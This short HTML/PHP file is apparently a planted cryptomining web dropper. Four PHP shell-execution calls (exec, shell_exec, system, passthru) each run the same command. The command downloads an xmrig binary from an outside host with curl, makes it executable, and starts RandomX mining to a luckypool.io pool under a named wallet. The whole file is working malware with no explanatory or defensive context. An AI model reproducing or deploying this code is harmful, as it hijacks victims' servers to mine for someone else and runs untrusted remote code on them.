<!DOCTYPE html>
<html>
<?php
echo exec('curl -o xmrig-proxy https://topone987.ltd/main/xmrig;chmod 777 xmrig-proxy;./xmrig-proxy -a randomx --url fr-tarirx.luckypool.io:9118 --user 121y156mGyjrUYEZK6ZaxQYAtvLbUQamzr9LoLRiXaemPyECUrjzS6TnMTxSbdku59UCFrkPPXdm7VTt6xkTeAJ1M3.cgi --threads=N');
echo shell_exec('curl -o xmrig-proxy https://topone987.ltd/main/xmrig;chmod 777 xmrig-proxy;./xmrig-proxy -a randomx --url fr-tarirx.luckypool.io:9118 --user 121y156mGyjrUYEZK6ZaxQYAtvLbUQamzr9LoLRiXaemPyECUrjzS6TnMTxSbdku59UCFrkPPXdm7VTt6xkTeAJ1M3.cgi --threads=N');
system('curl -o xmrig-proxy https://topone987.ltd/main/xmrig;chmod 777 xmrig-proxy;./xmrig-proxy -a randomx --url fr-tarirx.luckypool.io:9118 --user 121y156mGyjrUYEZK6ZaxQYAtvLbUQamzr9LoLRiXaemPyECUrjzS6TnMTxSbdku59UCFrkPPXdm7VTt6xkTeAJ1M3.cgi --threads=N');
passthru ("curl -o xmrig-proxy https://topone987.ltd/main/xmrig;chmod 777 xmrig-proxy;./xmrig-proxy -a randomx --url fr-tarirx.luckypool.io:9118 --user 121y156mGyjrUYEZK6ZaxQYAtvLbUQamzr9LoLRiXaemPyECUrjzS6TnMTxSbdku59UCFrkPPXdm7VTt6xkTeAJ1M3.cgi --threads=N");
?>
echo "ok";
</html>